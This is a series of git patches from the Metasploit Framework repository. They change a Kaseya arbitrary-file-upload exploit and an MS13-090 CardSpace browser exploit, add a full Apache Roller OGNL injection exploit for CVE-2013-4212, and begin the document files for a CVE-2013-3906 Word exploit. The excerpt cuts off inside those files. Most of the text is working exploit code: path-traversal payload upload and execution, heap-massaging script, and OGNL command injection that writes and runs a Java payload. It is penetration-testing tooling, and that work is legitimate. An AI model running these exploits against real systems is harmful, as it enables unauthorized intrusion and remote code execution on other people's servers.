Subject: [PATCH 030/217] Fix the arch declaration in uploaded module.

---
 .../http/kaseya_uploadimage_file_upload.rb    | 62 ++++++++++++-------
 1 file changed, 41 insertions(+), 21 deletions(-)
 mode change 100644 => 100755 modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
old mode 100644
new mode 100755
index 825c24827e..11fd17e77b
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -24,7 +24,7 @@ Code executed in this manner runs under the IUSR account.
 			},
 			'Author'         =>
 				[
-					'Thomas Hibbert' # thomas.hibbert@security-assessment.com
+					'Thomas Hibbert' # cartel
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -35,7 +35,7 @@ Code executed in this manner runs under the IUSR account.
 					'BadChars' => "\x00",
 				},
 			'Platform'       => 'win',
-			'Arch'		     => ARCH_x86,
+			'Arch'		     => ARCH_X86,
 			'Targets'        =>
 				[
                                  [ 'Kaseya KServer / Windows', {} ],
@@ -62,6 +62,21 @@ Code executed in this manner runs under the IUSR account.
 		return Exploit::CheckCode::Appears
 	end
 
+        def get_cookie
+          res = send_request_cgi({
+                                   'method' => 'GET',
+                                   'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
+                                 })
+
+          if res and res.headers['Set-Cookie']
+            cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
+          else
+            fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
+          end
+
+          cookie
+        end
+
 	def exploit
           peer = "#{rhost}:#{rport}"
           
@@ -69,25 +84,30 @@ Code executed in this manner runs under the IUSR account.
           exe  = generate_payload_exe
           asp  = Msf::Util::EXE.to_exe_asp(exe)          
 
-		data = Rex::MIME::Message.new
-          data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"")
+          post_data = Rex::MIME::Message.new
+          post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"")
 
-		res = send_request_raw({
-			'method' => 'POST',
-                                         'uri'    => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'),
-                                         'data'   => data,
-			'headers'	=> {
-                                           'ctype' => 'multipart/form-data; boundary=#{data.bound}'
-			}
-		})
-		if not res or res.code != 200
-			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
-		end
 
-		print_status("#{peer} - Executing payload #{@payload_name}")
-		res = send_request_raw({
-			'uri'    => normalize_uri(@payload_name),
-			'method' => 'GET'
-		})
+          data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+          cookie = get_cookie
+          res = send_request_raw({
+                                   'method' => 'POST',
+                                   'uri'    => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\..\\'+@payload_name),
+                                   'data'   => data,
+                                   'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+                                   'cookie' => cookie
+                                 })
+
+          if not res or res.code != 200
+            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+          end
+          
+          print_status("#{peer} - Executing payload #{@payload_name}")
+          res = send_request_cgi({
+                                   'uri'    => normalize_uri(@payload_name),
+                                   'method' => 'GET'
+                                 })
 	end
-end
+      end
+   

From 237bb227716d17d819bf3b9d50e952ee36e417d6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 18 Nov 2013 08:54:22 -0600
Subject: [PATCH 031/217] Disable auto migrate

---
 .../windows/browser/ms13_090_cardspacesigninhelper.rb  | 10 +---------
 1 file changed, 1 insertion(+), 9 deletions(-)

diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
index e800c4120d..8ec4f40f8e 100644
--- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -56,10 +56,6 @@ class Metasploit3 < Msf::Exploit::Remote
                               "\x8b\x20"                 + # mov esp, [eax]
                               "\x81\xC4\x30\xF8\xFF\xFF",  # add esp, -2000
         },
-      'DefaultOptions'  =>
-        {
-          'InitialAutoRunScript' => 'migrate -f'
-        },
       'Platform'       => 'win',
       'BrowserRequirements' =>
         {
@@ -83,11 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Nov 08 2013",
       'DefaultTarget'  => 0))
 
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class
-    )
   end
 
   def exploit_template(cli, target_info)
@@ -124,6 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
     </script>
     <script language='vbscript'>
     On Error Resume Next
+    Dim <%=symbols["massage_array_length"]%>,<%=symbols["underflow"]%>,<%=symbols["zero"]%>
     Dim <%=symbols["massage_array"]%>(5493)
     <%=symbols["massage_array_length"]%> = 5493
     <%=symbols["underflow"]%> = -7

From bddb314073bd55d0c2a675cf97ebe3c27c2be862 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 18 Nov 2013 09:09:20 -0600
Subject: [PATCH 032/217] Fix usage of Retries

---
 .../browser/ms13_090_cardspacesigninhelper.rb        | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
index 8ec4f40f8e..2de5599e9d 100644
--- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -75,6 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ]
         ],
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'Retries'              => false
+        },
       'Privileged'     => false,
       'DisclosureDate' => "Nov 08 2013",
       'DefaultTarget'  => 0))
@@ -104,7 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
     js_payload = Rex::Text.to_unescape(rop_payload)
 
     html_template = %Q|
-    <html><body>
+    <html>
+    <head>
+    <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
+    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
+    </head>
+    <body>
     <object classid='clsid:19916E01-B44E-4E31-94A4-4696DF46157B' id='<%=symbols["CardSpaceSigninHelper"]%>'></object>
     <script language='JavaScript'>
 

From 14c6ab4ca52c5a5cdc440e190906ea4929744e15 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 19 Nov 2013 10:25:52 -0600
Subject: [PATCH 033/217] Add module for CVE-2013-4212

---
 .../http/apache_roller_ognl_injection.rb      | 139 ++++++++++++++++++
 1 file changed, 139 insertions(+)
 create mode 100644 modules/exploits/multi/http/apache_roller_ognl_injection.rb

diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb
new file mode 100644
index 0000000000..6847943431
--- /dev/null
+++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Roller OGNL Injection',
+      'Description'    => %q{
+        This module exploits an OGNL injection vulnerability in Apache Roller < 5.0.2. The
+        vulnerability is due to an OGNL injection on the UIAction controller because of an
+        insecure usage of the ActionSupport.getText method. This module has been tested
+        successfully on Apache Roller 5.0.1 on Ubuntu 10.04.
+      },
+      'Author'         =>
+        [
+          'Unknown', # From coverity.com / Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-4212'],
+          [ 'URL', 'http://security.coverity.com/advisory/2013/Oct/remote-code-execution-in-apache-roller-via-ognl-injection.html']
+        ],
+      'Platform'      => 'java',
+      'Arch'          => ARCH_JAVA,
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          [ 'Apache Roller 5.0.1', { } ]
+        ],
+      'DisclosureDate' => 'Oct 31 2013',
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to the Apache Roller application.', "/roller"])
+        ], self.class)
+  end
+
+  def execute_command(cmd)
+    injection = "%24{(%23_memberAccess[\"allowStaticMethodAccess\"]%3dtrue,CMD,'')}"
+    injection.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
+
+    vprint_status("Attempting to execute: #{cmd}")
+
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path.to_s, "roller-ui", "login.rol"),
+      'encode_params' => false,
+      'vars_get' =>
+      {
+        'pageTitle' => injection
+      }
+    })
+  end
+
+  def java_upload_part(part, filename, append = 'false')
+    cmd = "#f=new java.io.FileOutputStream('#{filename}'+#a,#{append}),"
+    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
+    cmd << "#f.close(),#a='#{@random_suffix}'"
+    execute_command(cmd)
+  end
+
+  def exploit
+
+    print_status("Checking injection...")
+
+    if check == Exploit::CheckCode::Vulnerable
+      print_good("Target looks vulnerable, exploiting...")
+    else
+      print_warning("Target not found as vulnerable, trying anyway...")
+    end
+
+    @random_suffix = rand_text_alphanumeric(3) # To avoid duplicate execution
+    @payload_exe = rand_text_alphanumeric(4+rand(4)) + ".jar"
+    append = 'false'
+    jar = payload.encoded_jar.pack
+
+    File.open("/tmp/#{@payload_exe}", "wb") do |f| f.write(jar) end
+
+    chunk_length = 384 # 512 bytes when base64 encoded
+
+    parts = jar.chars.each_slice(chunk_length).map(&:join)
+    parts.each do |part|
+      java_upload_part(part, @payload_exe, append)
+      append = 'true'
+    end
+
+    register_files_for_cleanup("#{@payload_exe}null", "#{@payload_exe}#{@random_suffix}")
+
+    cmd = ""
+    # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
+    cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
+    cmd << "#q.setAccessible(true),#q.set(null,true),"
+    cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
+    cmd << "#q.setAccessible(true),#q.set(null,false),"
+    # create classloader
+    cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}'+#a).toURI().toURL()}),#a='#{rand_text_alphanumeric(4)}',"
+    # load class
+    cmd << "#c=#cl.loadClass('metasploit.Payload'),"
+    # invoke main method
+    cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
+    cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
+    execute_command(cmd)
+  end
+
+  def check
+    addend_one = rand_text_numeric(rand(3) + 1).to_i
+    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    sum = addend_one + addend_two
+
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path.to_s, "roller-ui", "login.rol"),
+      'vars_get' =>
+        {
+          'pageTitle' => "${new java.lang.Integer(#{addend_one}+#{addend_two})}",
+        }
+    })
+
+    if res and res.code == 200 and res.body =~ /#{sum}/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+end

From 26a5e3726655c265f0b1416da43a953e88864d47 Mon Sep 17 00:00:00 2001
From: Thomas Hibbert <thomas.hibbert@security-assessment.com>
Date: Wed, 20 Nov 2013 12:27:22 +1300
Subject: [PATCH 034/217] Use MSF::Exploit:FileDropper to register the uploaded
 file for cleanup.

---
 .../http/kaseya_uploadimage_file_upload.rb    | 103 +++++++++---------
 1 file changed, 50 insertions(+), 53 deletions(-)
 mode change 100755 => 100644 modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
old mode 100755
new mode 100644
index 11fd17e77b..0a69792a03
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -1,66 +1,62 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+        Rank = ExcellentRanking
 
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::EXE
+        include Msf::Exploit::Remote::HttpClient
+        include Msf::Exploit::EXE
+        include Msf::Exploit::FileDropper
 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Kaseya uploadImage Arbitrary File Upload',
-			'Description'    => %q{
-					This module exploits an arbitrary file upload vulnerability found in Kaseya 6.3.0.0
-				A malicious user can upload a file to an arbitrary directory without authentication, which can result in arbitrary code execution.
+        def initialize(info = {})
+                super(update_info(info,
+                        'Name'           => 'Kaseya uploadImage Arbitrary File Upload',
+                        'Description'    => %q{
+                                        This module exploits an arbitrary file upload vulnerability found in Kaseya 6.3.0.0
+                                A malicious user can upload a file to an arbitrary directory without authentication, which can result in arbitrary code execution.
 Code executed in this manner runs under the IUSR account.
-			},
-			'Author'         =>
-				[
-					'Thomas Hibbert' # cartel
-				],
-			'License'        => MSF_LICENSE,
-			'References'     =>
-				[
-				],
-			'Payload'	     =>
-				{
-					'BadChars' => "\x00",
-				},
-			'Platform'       => 'win',
-			'Arch'		     => ARCH_X86,
-			'Targets'        =>
-				[
+                        },
+                        'Author'         =>
+                                [
+                                        'Thomas Hibbert' # cartel
+                                ],
+                        'License'        => MSF_LICENSE,
+                        'References'     => [ 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf' ],
+                        'Payload'            =>
+                                {
+                                },
+                        'Platform'       => 'win',
+                        'Arch'               => ARCH_X86,
+                        'Targets'        =>
+                                [
                                  [ 'Kaseya KServer / Windows', {} ],
-				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'some point....'))
+                                ],
+                        'DefaultTarget'  => 0,
+                        'DisclosureDate' => 'Nov 18 2013'))
 
-		register_options(
-			[                     
+                register_options(
+                        [
                          Opt::RPORT(80), Opt::RHOST()
-			], self.class)
-	end
+                        ], self.class)
+        end
 
-	def check
-		res = send_request_cgi({
-			'method' => 'POST',
-			'uri'    => normalize_uri('SystemTab','uploadImage.asp')
-		})
+        def check
+                res = send_request_cgi({
+                        'method' => 'POST',
+                        'uri'    => normalize_uri('SystemTab','uploadImage.asp')
+                })
 
-		if not res or res.code != 200
-			return Exploit::CheckCode::Unknown
-		end
+                if not res or res.code != 200
+                        return Exploit::CheckCode::Unknown
+                end
 
-		return Exploit::CheckCode::Appears
-	end
+                return Exploit::CheckCode::Appears
+        end
 
         def get_cookie
           res = send_request_cgi({
@@ -77,12 +73,12 @@ Code executed in this manner runs under the IUSR account.
           cookie
         end
 
-	def exploit
+        def exploit
           peer = "#{rhost}:#{rport}"
-          
+
           @payload_name = "#{rand_text_alpha_lower(8)}.asp"
           exe  = generate_payload_exe
-          asp  = Msf::Util::EXE.to_exe_asp(exe)          
+          asp  = Msf::Util::EXE.to_exe_asp(exe)
 
           post_data = Rex::MIME::Message.new
           post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"")
@@ -99,15 +95,16 @@ Code executed in this manner runs under the IUSR account.
                                    'cookie' => cookie
                                  })
 
+          register_files_for_cleanup(@payload_name)
+
           if not res or res.code != 200
             fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
           end
-          
+
           print_status("#{peer} - Executing payload #{@payload_name}")
           res = send_request_cgi({
                                    'uri'    => normalize_uri(@payload_name),
                                    'method' => 'GET'
                                  })
-	end
+        end
       end
-   

From c76fa32345ed74c1cc291b22b01f6a4e02580c4d Mon Sep 17 00:00:00 2001
From: Thomas Hibbert <thomas.hibbert@security-assessment.com>
Date: Wed, 20 Nov 2013 12:53:21 +1300
Subject: [PATCH 035/217] Fixed reference format

---
 .../exploits/windows/http/kaseya_uploadimage_file_upload.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
index 0a69792a03..3c84875dde 100644
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -26,10 +26,8 @@ Code executed in this manner runs under the IUSR account.
                                         'Thomas Hibbert' # cartel
                                 ],
                         'License'        => MSF_LICENSE,
-                        'References'     => [ 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf' ],
-                        'Payload'            =>
-                                {
-                                },
+                        'References'     => [['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']],
+                        'Payload'        => {},
                         'Platform'       => 'win',
                         'Arch'               => ARCH_X86,
                         'Targets'        =>

From 94e13a0b8adf5306ea9b2f40f55f69599f49faff Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 19 Nov 2013 23:10:32 -0600
Subject: [PATCH 036/217] Initial commit of CVE-2013-3906

---
 data/exploits/CVE-2013-3906/_rels/.rels       |   6 +
 data/exploits/CVE-2013-3906/docProps/app.xml  |  19 +
 data/exploits/CVE-2013-3906/docProps/core.xml |   8 +
 .../word/charts/_rels/chart1.xml.rels         |   4 +
 .../word/charts/_rels/chart2.xml.rels         |   4 +
 .../word/charts/_rels/chart3.xml.rels         |   4 +
 .../word/charts/_rels/chart4.xml.rels         |   4 +
 .../word/charts/_rels/chart5.xml.rels         |   4 +
 .../word/charts/_rels/chart6.xml.rels         |   4 +
 .../CVE-2013-3906/word/charts/chart1.xml      | 230 +++++++
 .../CVE-2013-3906/word/charts/chart2.xml      | 220 +++++++
 .../CVE-2013-3906/word/charts/chart3.xml      | 230 +++++++
 .../CVE-2013-3906/word/charts/chart4.xml      | 110 ++++
 .../CVE-2013-3906/word/charts/chart5.xml      | 228 +++++++
 .../CVE-2013-3906/word/charts/chart6.xml      | 238 +++++++
 .../Microsoft_Office_Excel_Worksheet1.xlsx    | Bin 0 -> 8544 bytes
 .../Microsoft_Office_Excel_Worksheet2.xlsx    | Bin 0 -> 8543 bytes
 .../Microsoft_Office_Excel_Worksheet3.xlsx    | Bin 0 -> 8544 bytes
 .../Microsoft_Office_Excel_Worksheet4.xlsx    | Bin 0 -> 8543 bytes
 .../Microsoft_Office_Excel_Worksheet5.xlsx    | Bin 0 -> 8542 bytes
 .../Microsoft_Office_Excel_Worksheet6.xlsx    | Bin 0 -> 8543 bytes
 .../exploits/CVE-2013-3906/word/fontTable.xml |  31 +
 .../CVE-2013-3906/word/media/image1.jpeg      | Bin 0 -> 19098 bytes
 data/exploits/CVE-2013-3906/word/settings.xml |  36 ++
 data/exploits/CVE-2013-3906/word/styles.xml   | 220 +++++++
 .../CVE-2013-3906/word/theme/theme1.xml       | 283 +++++++++
 .../CVE-2013-3906/word/webSettings.xml        |   4 +
 .../windows/fileformat/mswin_tiff_overflow.rb | 600 ++++++++++++++++++
 28 files changed, 2487 insertions(+)
 create mode 100755 data/exploits/CVE-2013-3906/_rels/.rels
 create mode 100755 data/exploits/CVE-2013-3906/docProps/app.xml
 create mode 100755 data/exploits/CVE-2013-3906/docProps/core.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/chart1.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/chart2.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/chart3.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/chart4.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/chart5.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/charts/chart6.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx
 create mode 100755 data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx
 create mode 100755 data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx
 create mode 100755 data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx
 create mode 100755 data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx
 create mode 100755 data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx
 create mode 100755 data/exploits/CVE-2013-3906/word/fontTable.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/media/image1.jpeg
 create mode 100755 data/exploits/CVE-2013-3906/word/settings.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/styles.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/theme/theme1.xml
 create mode 100755 data/exploits/CVE-2013-3906/word/webSettings.xml
 create mode 100644 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb

diff --git a/data/exploits/CVE-2013-3906/_rels/.rels b/data/exploits/CVE-2013-3906/_rels/.rels
new file mode 100755
index 0000000000..bf27b7dd5f
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/_rels/.rels
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
+<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
+</Relationships>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/docProps/app.xml b/data/exploits/CVE-2013-3906/docProps/app.xml
new file mode 100755
index 0000000000..fda5bfdf05
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/docProps/app.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
+<Template>Normal.dotm</Template>
+<TotalTime>4</TotalTime>
+<Pages>1</Pages>
+<Words>217</Words>
+<Characters>1238</Characters>
+<Application>Microsoft Office Word</Application>
+<DocSecurity>0</DocSecurity>
+<Lines>10</Lines>
+<Paragraphs>2</Paragraphs>
+<ScaleCrop>false</ScaleCrop>
+<Company>home</Company>
+<LinksUpToDate>false</LinksUpToDate>
+<CharactersWithSpaces>1453</CharactersWithSpaces>
+<SharedDoc>false</SharedDoc>
+<HyperlinksChanged>false</HyperlinksChanged>
+<AppVersion>12.0000</AppVersion>
+</Properties>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/docProps/core.xml b/data/exploits/CVE-2013-3906/docProps/core.xml
new file mode 100755
index 0000000000..d1b1819ff6
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/docProps/core.xml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+<dc:creator>Win7</dc:creator>
+<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
+<cp:revision>1</cp:revision>
+<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
+<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
+</cp:coreProperties>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels
new file mode 100755
index 0000000000..eccb5ced00
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
+</Relationships>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels
new file mode 100755
index 0000000000..99575aefc3
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
+</Relationships>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels
new file mode 100755
index 0000000000..1ed09c997d
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
+</Relationships>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels
new file mode 100755
index 0000000000..da6e235036
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
+</Relationships>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels
new file mode 100755
index 0000000000..de95b488db
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
+</Relationships>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels
new file mode 100755
index 0000000000..8bbd9603de
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
+</Relationships>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart1.xml b/data/exploits/CVE-2013-3906/word/charts/chart1.xml
new file mode 100755
index 0000000000..22a44c771d
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/chart1.xml
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
